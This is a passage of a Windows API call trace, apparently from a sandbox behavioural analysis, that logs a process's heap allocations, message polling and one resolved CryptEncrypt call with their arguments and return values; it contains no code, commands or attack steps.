wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.708] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0264.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.708] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xa81, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xa88) returned 1 [0264.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0264.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0264.713] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0264.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0264.713] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0264.713] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.714] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0264.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0264.715] CharLowerBuffW (in: lpsz="byte[2696]", cchLength=0xa | out: lpsz="byte[2696]") returned 0xa [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa88) returned 0x2f17fc8 [0264.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0264.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0264.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0264.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa81) returned 0x2f18a58 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa81) returned 0x2f194e8 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f18a58 | out: hHeap=0x970000) returned 1 [0264.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f194e8 | out: hHeap=0x970000) returned 1 [0264.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.718] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0264.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0264.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0264.718] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.718] 